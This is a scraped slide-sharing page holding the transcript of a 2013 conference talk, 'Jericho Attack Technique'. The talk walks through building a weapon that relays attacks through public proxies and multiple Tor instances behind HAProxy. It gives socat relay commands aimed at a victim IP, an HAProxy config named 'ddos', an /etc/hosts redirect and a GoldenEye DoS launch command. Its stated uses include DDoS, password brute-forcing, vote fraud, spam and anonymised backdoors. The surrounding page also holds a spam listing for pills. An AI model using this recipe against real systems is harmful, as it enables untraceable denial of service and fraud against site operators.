" Breaking Extreme Networks WingOS: How to own millions of devices running on..." Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on...PROIDEA
 
Entrepreneurship3
Entrepreneurship3Entrepreneurship3
Entrepreneurship3Yenwen Feng
 
FOSDEM 2021 - Infrastructure as Code Drift & Driftctl
FOSDEM 2021 - Infrastructure as Code Drift & DriftctlFOSDEM 2021 - Infrastructure as Code Drift & Driftctl
FOSDEM 2021 - Infrastructure as Code Drift & DriftctlStephane Jourdan
 
DevOps + MongoDB Realm Serverless Functions = 🤩
DevOps + MongoDB Realm Serverless Functions = 🤩DevOps + MongoDB Realm Serverless Functions = 🤩
DevOps + MongoDB Realm Serverless Functions = 🤩Lauren Hayward Schaefer
 
The various ways your RTC may be crushed
The various ways your RTC may be crushedThe various ways your RTC may be crushed
The various ways your RTC may be crushedSandro Gauci
 
Serverless survival kit
Serverless survival kitServerless survival kit
Serverless survival kitSteve Houël
 
ZeroNights - SmartTV
ZeroNights - SmartTV ZeroNights - SmartTV
ZeroNights - SmartTV Sergey Belov
 
Voicecon - Mashups with Tropo.com
Voicecon - Mashups with Tropo.comVoicecon - Mashups with Tropo.com
Voicecon - Mashups with Tropo.comVoxeo Corp
 

Similaire à Jericho Attack Technique (20)

⛳️ Votre API passe-t-elle le contrôle technique ?
⛳️ Votre API passe-t-elle le contrôle technique ?⛳️ Votre API passe-t-elle le contrôle technique ?
⛳️ Votre API passe-t-elle le contrôle technique ?
 
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por "Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
 
Flex and LiveCycle Data Services Best Practices from the Trenches (Adobe MAX ...
Flex and LiveCycle Data Services Best Practices from the Trenches (Adobe MAX ...Flex and LiveCycle Data Services Best Practices from the Trenches (Adobe MAX ...
Flex and LiveCycle Data Services Best Practices from the Trenches (Adobe MAX ...
 
Open source mobile development solutions
Open source mobile development solutionsOpen source mobile development solutions
Open source mobile development solutions
 
Thor - RSLA - 13oct2009
Thor - RSLA - 13oct2009Thor - RSLA - 13oct2009
Thor - RSLA - 13oct2009
 
Let's contribute, HTML5Rocks/ko!
Let's contribute, HTML5Rocks/ko!Let's contribute, HTML5Rocks/ko!
Let's contribute, HTML5Rocks/ko!
 
Cr java concept by vikas jagtap
Cr java  concept by vikas jagtapCr java  concept by vikas jagtap
Cr java concept by vikas jagtap
 
[RHFSeoul2017]6 Steps to Transform Enterprise Applications
[RHFSeoul2017]6 Steps to Transform Enterprise Applications[RHFSeoul2017]6 Steps to Transform Enterprise Applications
[RHFSeoul2017]6 Steps to Transform Enterprise Applications
 
Drools Workshop 2015 - LATAM
Drools Workshop 2015 - LATAMDrools Workshop 2015 - LATAM
Drools Workshop 2015 - LATAM
 
CommunityOneEast 09 - Dynamic Languages: the next big thing for the JVM or an...
CommunityOneEast 09 - Dynamic Languages: the next big thing for the JVM or an...CommunityOneEast 09 - Dynamic Languages: the next big thing for the JVM or an...
CommunityOneEast 09 - Dynamic Languages: the next big thing for the JVM or an...
 
Breaking Extreme Networks WingOS: How to own millions of devices running on A...
Breaking Extreme Networks WingOS: How to own millions of devices running on A...Breaking Extreme Networks WingOS: How to own millions of devices running on A...
Breaking Extreme Networks WingOS: How to own millions of devices running on A...
 
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on..." Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
 
Entrepreneurship3
Entrepreneurship3Entrepreneurship3
Entrepreneurship3
 
FOSDEM 2021 - Infrastructure as Code Drift & Driftctl
FOSDEM 2021 - Infrastructure as Code Drift & DriftctlFOSDEM 2021 - Infrastructure as Code Drift & Driftctl
FOSDEM 2021 - Infrastructure as Code Drift & Driftctl
 
DevOps + MongoDB Realm Serverless Functions = 🤩
DevOps + MongoDB Realm Serverless Functions = 🤩DevOps + MongoDB Realm Serverless Functions = 🤩
DevOps + MongoDB Realm Serverless Functions = 🤩
 
The various ways your RTC may be crushed
The various ways your RTC may be crushedThe various ways your RTC may be crushed
The various ways your RTC may be crushed
 
Serverless survival kit
Serverless survival kitServerless survival kit
Serverless survival kit
 
Develop microservices in php
Develop microservices in phpDevelop microservices in php
Develop microservices in php
 
ZeroNights - SmartTV
ZeroNights - SmartTV ZeroNights - SmartTV
ZeroNights - SmartTV
 
Voicecon - Mashups with Tropo.com
Voicecon - Mashups with Tropo.comVoicecon - Mashups with Tropo.com
Voicecon - Mashups with Tropo.com
 

Dernier

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard37
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKJago de Vreede
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityWSO2
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...apidays
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusZilliz
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...apidays
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Zilliz
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAnitaRaj43
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 

Dernier (20)

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptx
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by Anitaraj
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 

Jericho Attack Technique

  • 1. Jericho Attack TechniqueJericho Attack Technique Cluster-bombing TCP attacks for maximum impactCluster-bombing TCP attacks for maximum impact Jan SeidlJan Seidl jseidl@wroot.orgjseidl@wroot.org @jseidl@jseidl
  • 2. $ whoami$ whoami AboutAbout Full Name: Jan SeidlFull Name: Jan Seidl Origin: Rio de Janeiro, RJ – BrazilOrigin: Rio de Janeiro, RJ – Brazil Work:Work: ● CTO @ TI SafeCTO @ TI Safe ● OpenSource contributor for: PEV, LogstashOpenSource contributor for: PEV, Logstash ● Codes and snippets @ github.com/jseidlCodes and snippets @ github.com/jseidl Features:Features: ● UNIX Evangelist/Addict/Freak (but no fanboy!)UNIX Evangelist/Addict/Freak (but no fanboy!) ● Python and C loverPython and C lover ● Coffee dependentCoffee dependent ● Hates printers and social networksHates printers and social networks ● Proud DC Labs ResearcherProud DC Labs Researcher Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil
  • 3. $ whoami$ whoami Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil
  • 4. $ whoami$ whoami Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil STUPID, BROKE, NERD, BROKESTUPID, BROKE, NERD, BROKE
  • 5. DisclaimerDisclaimer ‘‘Jericho’ is a product from the fictional company ‘StarkJericho’ is a product from the fictional company ‘Stark Industries’ from “The Iron Man” movie franchise fromIndustries’ from “The Iron Man” movie franchise from Paramount Pictures and Marvel Studios, as well as anyParamount Pictures and Marvel Studios, as well as any related picture presented in this presentation.related picture presented in this presentation. Please do not sue me.Please do not sue me. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil
  • 6. x00 Overviewx00 Overview x01 Application / Usesx01 Application / Uses x02 Required Partsx02 Required Parts x03 Weapon Assemblyx03 Weapon Assembly x04 Weapon Tuningx04 Weapon Tuning x05 Launching the attackx05 Launching the attack x06 Weapon Maintenancex06 Weapon Maintenance x07 Escalating Firepowerx07 Escalating Firepower x08 Turning into a Smart Weaponx08 Turning into a Smart Weapon x09 Demo!x09 Demo! Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil AgendaAgenda
  • 7. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil OverviewOverview The attack consists on utilizingThe attack consists on utilizing public SOCKS proxiespublic SOCKS proxies andand TOR instancesTOR instances throughthrough socket multiplexingsocket multiplexing softwaresoftware (e.g.: Load Balancing/Cluster software) as(e.g.: Load Balancing/Cluster software) as relays for attacks in a load-balancing fashionrelays for attacks in a load-balancing fashion At a glance
  • 8. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil OverviewOverview public SOCKS proxies + TOR instances + socketpublic SOCKS proxies + TOR instances + socket multiplexing softwaremultiplexing software At a glance
  • 9. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil OverviewOverview At a glance
  • 10. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil OverviewOverview Schematics Attacker Proxy 1 Proxy 2 Proxy 3 Proxy 4 Proxy 5 Proxy 6 Proxy 7 VictimHAProxy
  • 11. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil OverviewOverview Evading connection and rate limitingEvading connection and rate limiting Bypassing country/origin restrictionsBypassing country/origin restrictions Hiding origin of attacks, making forensics people sad :(Hiding origin of attacks, making forensics people sad :( Low bandwidth attack such as Layer 7 DOS attacksLow bandwidth attack such as Layer 7 DOS attacks Very efficient for Ataques DoS Super Eficientes: Layer 7, Android, load balancing e Tor (pt_BR)Ataques DoS Super Eficientes: Layer 7, Android, load balancing e Tor (pt_BR) http://slidesha.re/14yYiuVhttp://slidesha.re/14yYiuV
  • 12. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil OverviewOverview At first HAProxy may seem as a load balancer strictlyAt first HAProxy may seem as a load balancer strictly for HTTP(S), but it’s not.for HTTP(S), but it’s not. HAProxy’s actual description is “The Reliable, HighHAProxy’s actual description is “The Reliable, High PerformancePerformance TCPTCP/HTTP Load Balancer”./HTTP Load Balancer”. Cool, huh?Cool, huh? Paying closer attention
  • 13. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil UsesUses Applications for the Jericho Attack Technique
  • 14. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil UsesUses Web scraping/spideringWeb scraping/spidering Limited API requestsLimited API requests IP-based anti-fraud schemes (eg: Online Voting)IP-based anti-fraud schemes (eg: Online Voting) User enumerationUser enumeration Password brute-forcingPassword brute-forcing Basic multiplexing use
  • 15. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil UsesUses Making Layer 7 Denial-of-Service attacks intoMaking Layer 7 Denial-of-Service attacks into distributed configuration (DoS → DdoS)distributed configuration (DoS → DdoS) (I like this one very much in particular)(I like this one very much in particular) Hitting hard
  • 16. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil UsesUses Multiplexing mail relays for SPAMMultiplexing mail relays for SPAM Multiplexing and anonymizing backdoor connections /Multiplexing and anonymizing backdoor connections / commandscommands Even more? Go crazy!Even more? Go crazy! Going deeper
  • 17. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil UsesUses FTPFTP SMTP(S) POP3(S) IMAP(S)SMTP(S) POP3(S) IMAP(S) SSHSSH RDP / VNCRDP / VNC MySQLMySQL many more...many more... Possibly supported protocols
  • 18. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Building the weapon
  • 19. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Main assembly Socat: Multipurpose RelaySocat: Multipurpose Relay http://www.dest-unreach.org/socat/http://www.dest-unreach.org/socat/ SSL support:SSL support: HTTPS, IMAPS, POPS, LDAPSHTTPS, IMAPS, POPS, LDAPS
  • 20. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Main assembly HAProxyHAProxy http://haproxy.1wt.eu/http://haproxy.1wt.eu/ ““The Reliable, High Performance TCP/HTTP LoadThe Reliable, High Performance TCP/HTTP Load Balancer”Balancer” REQUEST → HAPROXY → { SERVER A, SERVER B,REQUEST → HAPROXY → { SERVER A, SERVER B, SERVER C }SERVER C }
  • 21. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Resources SOCKS/HTTP(S) ProxiesSOCKS/HTTP(S) Proxies http://www.proxynova.com/proxy-server-list/http://www.proxynova.com/proxy-server-list/ http://hidemyass.com/proxy-list/http://hidemyass.com/proxy-list/ Just google it...Just google it...
  • 22. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Resources TOR exit nodesTOR exit nodes PRO TIP: You can run as many TOR tunnels as you want (:PRO TIP: You can run as many TOR tunnels as you want (: tor --RunAsDaemon 1 --CookieAuthentication 0tor --RunAsDaemon 1 --CookieAuthentication 0 --HashedControlPassword "pwd" --ControlPort 4444 --PidFile--HashedControlPassword "pwd" --ControlPort 4444 --PidFile torN.pid --SocksPort 9050 --DataDirectory data/torNtorN.pid --SocksPort 9050 --DataDirectory data/torN Multi-TORMulti-TOR https://github.com/jseidl/Multi-TOR/https://github.com/jseidl/Multi-TOR/ EX: ./multi-tor.sh 5 # Opens 5 TOR instancesEX: ./multi-tor.sh 5 # Opens 5 TOR instances
  • 23. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Important Note The proxies may or may not require authentication since socatThe proxies may or may not require authentication since socat supports proxy authentication adding the parameter as follows:supports proxy authentication adding the parameter as follows: proxyauth=user:passproxyauth=user:pass
  • 24. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Important Note Some public proxies append additional headers like X-Forwarded-For thatSome public proxies append additional headers like X-Forwarded-For that may ruin the whole purpose of utilizing a Jericho attack perspective.may ruin the whole purpose of utilizing a Jericho attack perspective. (Thanks for Lucas Fernando Amorim for remembering that!)(Thanks for Lucas Fernando Amorim for remembering that!)
  • 25. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts Important Note For TOR, one can useFor TOR, one can use two-hop circuits for maximumtwo-hop circuits for maximum performance and degraded anonymityperformance and degraded anonymity oror greater-hopgreater-hop circuits for greater anonymity and degraded performancecircuits for greater anonymity and degraded performance.. It just depends on the use.It just depends on the use. Tor: Four Hops instead of ThreeTor: Four Hops instead of Three http://coldwaterq.com/?11http://coldwaterq.com/?11 TOR Auto-circuitTOR Auto-circuit https://thesprawl.org/projects/tor-autocircuit/https://thesprawl.org/projects/tor-autocircuit/ TOR control protocolTOR control protocol https://thesprawl.org/research/tor-control-protocol/https://thesprawl.org/research/tor-control-protocol/
  • 26. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Required partsRequired parts (not so) Important Note I’ve developed a python tool named (albeit not very creatively)I’ve developed a python tool named (albeit not very creatively) proxygetproxyget.. BeautifulSoup + Mechanize = Smart Scraping!BeautifulSoup + Mechanize = Smart Scraping! Scripting → HAProxy.conf auto-generation for a Jericho attackScripting → HAProxy.conf auto-generation for a Jericho attack This tool is yet to be released. Stay tuned!This tool is yet to be released. Stay tuned!
  • 27. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon AssemblyWeapon Assembly Sticking the parts together Easy simple steps:Easy simple steps: 1. Create lots of socat bindings to the victim, each from a1. Create lots of socat bindings to the victim, each from a different resource (proxy or TOR instance)different resource (proxy or TOR instance) 2. Configure the locally bound socat ports in HAProxy2. Configure the locally bound socat ports in HAProxy 3. Point victim's DNS name to localhost on /etc/hosts3. Point victim's DNS name to localhost on /etc/hosts 4. Fire at will4. Fire at will
  • 28. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon AssemblyWeapon Assembly Sticking the parts together: socat with proxies # socat TCP4-LISTEN:80# socat TCP4-LISTEN:80 PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT> # socat TCP4-LISTEN:8081# socat TCP4-LISTEN:8081 PROXY:190.221.25.225:93.184.216.119:80,proxyport=8080PROXY:190.221.25.225:93.184.216.119:80,proxyport=8080 Example:Example:
  • 29. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon AssemblyWeapon Assembly Sticking the parts together: socat with TOR # socat TCP4­LISTEN:80,fork# socat TCP4­LISTEN:80,fork SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9050SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9050 # socat TCP4-LISTEN:8081# socat TCP4-LISTEN:8081 SOCKS4A:localhost:93.184.216.119:80,socksport=9050SOCKS4A:localhost:93.184.216.119:80,socksport=9050 Example:Example:
  • 30. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon AssemblyWeapon Assembly Sticking the parts together: HAProxy listen ddos 0.0.0.0:80listen ddos 0.0.0.0:80 mode tcpmode tcp balancebalance roundrobinroundrobin serverserver inst1 localhost:8080inst1 localhost:8080 serverserver inst2 localhost:8081inst2 localhost:8081 serverserver inst3 localhost:8082inst3 localhost:8082 serverserver inst4 localhost:8083inst4 localhost:8083
  • 31. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon AssemblyWeapon Assembly Sticking the parts together: HAProxy (larger sample) globalglobal maxconn 10000maxconn 10000 # set this accordingly to MAX within your kernel socket limits# set this accordingly to MAX within your kernel socket limits user haproxyuser haproxy group haproxygroup haproxy daemondaemon defaultsdefaults mode tcpmode tcp retries 3retries 3 option redispatchoption redispatch maxconn 20000maxconn 20000 # set accordingly# set accordingly contimeout 5000contimeout 5000 # set accordingly# set accordingly clitimeout 50000clitimeout 50000 # set accordingly# set accordingly srvtimeout 50000srvtimeout 50000 # set accordingly# set accordingly # Below we are configuring our socket list. You may mix TOR sockets with SOCKS-proxied# Below we are configuring our socket list. You may mix TOR sockets with SOCKS-proxied sockets.sockets. listen jericho 0.0.0.0:80listen jericho 0.0.0.0:80 # just a instance name# just a instance name mode tcpmode tcp balance roundrobinbalance roundrobin # gives more time within socket/outoging IP reuse# gives more time within socket/outoging IP reuse server inst1 localhost:8080server inst1 localhost:8080 # SOCKS proxy# SOCKS proxy server inst2 localhost:9051server inst2 localhost:9051 # TOR instance# TOR instance server inst3 localhost:9052server inst3 localhost:9052 # TOR instance# TOR instance
  • 32. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon AssemblyWeapon Assembly Sticking the parts together: /etc/hosts # Jericho target below this line# Jericho target below this line # make him suffer (:# make him suffer (: example.com, www.example.comexample.com, www.example.com 127.0.0.1127.0.0.1
  • 33. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon AssemblyWeapon Assembly Ta-da!
  • 34. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon TuningWeapon Tuning Moar firepower!Moar firepower!
  • 35. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon TuningWeapon Tuning About performanceAbout performance There are several parameters on the linux kernel that can beThere are several parameters on the linux kernel that can be tuned in order to achieve better TCP performance.tuned in order to achieve better TCP performance. Because ‘performance’ is relative to the attack being conductedBecause ‘performance’ is relative to the attack being conducted (you may need more bandwidth or more concurrent connections(you may need more bandwidth or more concurrent connections or anything else), there are several options that one mustor anything else), there are several options that one must consider.consider.
  • 36. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon TuningWeapon Tuning Linux Tuning ResourcesLinux Tuning Resources TCP Performance Tuning | SoftpanoramaTCP Performance Tuning | Softpanorama http://bit.ly/17RiLWvhttp://bit.ly/17RiLWv Linux Tweaking | Speedguide.netLinux Tweaking | Speedguide.net http://bit.ly/18JDnlLhttp://bit.ly/18JDnlL Improving TCP performance over a gigabit network with lots ofImproving TCP performance over a gigabit network with lots of connections and high traffic of small packets | ServerFaultconnections and high traffic of small packets | ServerFault http://bit.ly/1fRyjhZhttp://bit.ly/1fRyjhZ Linux TCP/IP Tuning | LognormalLinux TCP/IP Tuning | Lognormal http://bit.ly/17Rj8QNhttp://bit.ly/17Rj8QN
  • 37. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Launching the attackLaunching the attack
  • 38. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Launching the attackLaunching the attack Check that everything is workingCheck that everything is working You may want to socat resources first to an IP testing website toYou may want to socat resources first to an IP testing website to verify that Jericho is working successfullyverify that Jericho is working successfully Then rebind sockets to final destination (victim)Then rebind sockets to final destination (victim) (don't forget the /etc/hosts entry!)(don't forget the /etc/hosts entry!)
  • 39. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Launching the attackLaunching the attack Fire in the hole!Fire in the hole! # ./goldeneye.py http://www.example.com/index.php -t# ./goldeneye.py http://www.example.com/index.php -t 1000 -m get1000 -m get Ahhh... easy and transparent!Ahhh... easy and transparent!
  • 40. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Launching the attackLaunching the attack Fire in the hole!Fire in the hole!
